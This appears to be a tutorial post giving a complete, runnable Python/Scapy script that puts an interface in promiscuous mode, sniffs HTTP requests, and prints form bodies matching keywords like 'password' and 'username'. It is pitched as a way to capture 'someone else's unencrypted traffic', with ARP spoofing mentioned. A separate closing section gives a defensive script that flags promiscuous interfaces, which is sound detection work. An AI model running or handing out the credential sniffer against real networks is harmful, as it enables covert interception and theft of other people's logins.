There is always a chance of capturing someone else's unencrypted traffic, especially on a local network. We might use ARP spoofing, poisoning, a gateway attack or whatever, but Scapy is one of the great tools for checking a network environment.
Prerequisites
$ sudo apt-get install python-scapy python-pip
$ pip install scapy_http
Enable promiscuous mode on the network interface (eth0 here; substitute your own interface name)
$ sudo ifconfig eth0 promisc
It is always best to try this on a bridged network. To avoid interference, testing on the local host machine is the best practice.
import argparse

import scapy.all as scapy
from scapy_http import http


def get_arguments():
    # -i / --interface selects the interface to listen on
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface", help="Interface name")
    options = parser.parse_args()
    return options


def sniff_packet(interface):
    # store=False keeps packets out of memory; each one is handed to process_packets
    scapy.sniff(iface=interface, store=False, prn=process_packets)


def get_url(packet):
    # Host and Path are bytes under Python 3, so decode before printing
    request = packet[http.HTTPRequest]
    return (request.Host + request.Path).decode(errors="replace")


def get_credentials(packet):
    # The Raw layer carries the request body, e.g. submitted form fields
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load.decode(errors="replace")
        keywords = ["login", "submission", "challenge", "password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load


def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")


options = get_arguments()
sniff_packet(options.interface)
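A defender's counterpart to the promiscuous-mode step above, added here as an example (not code from the original post): it reads the Linux interface flags under /sys/class/net and reports every interface that has the IFF_PROMISC bit (0x100) set. The function names and the sample flag values are constructed for illustration.

```python
import os
import tempfile

IFF_UP = 0x1          # interface is administratively up
IFF_PROMISC = 0x100   # promiscuous bit, as defined in <linux/if.h>


def read_flags(path):
    """Return the integer flags from a sysfs 'flags' file, or None if unreadable."""
    try:
        with open(path) as handle:
            return int(handle.read().strip(), 16)
    except (OSError, ValueError):
        return None


def promiscuous_interfaces(sysfs_root="/sys/class/net"):
    """Map each promiscuous interface name to whether it is also up."""
    found = {}
    if not os.path.isdir(sysfs_root):
        return found
    for name in sorted(os.listdir(sysfs_root)):
        flags = read_flags(os.path.join(sysfs_root, name, "flags"))
        if flags is not None and flags & IFF_PROMISC:
            found[name] = bool(flags & IFF_UP)
    return found


def build_sample_tree(root):
    """Constructed sample data: fake sysfs entries so the check runs offline."""
    samples = {"eth0": "0x1103\n", "lo": "0x9\n", "wlan0": "0x1102\n", "bad0": "garbage\n"}
    for name, text in samples.items():
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "flags"), "w") as handle:
            handle.write(text)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print("sample tree:", promiscuous_interfaces(build_sample_tree(tmp)))
    print("this host:  ", promiscuous_interfaces())
```

Run on a schedule or from a host agent, an unexpected entry in the result is a cue to find out which process asked for promiscuous mode on that interface.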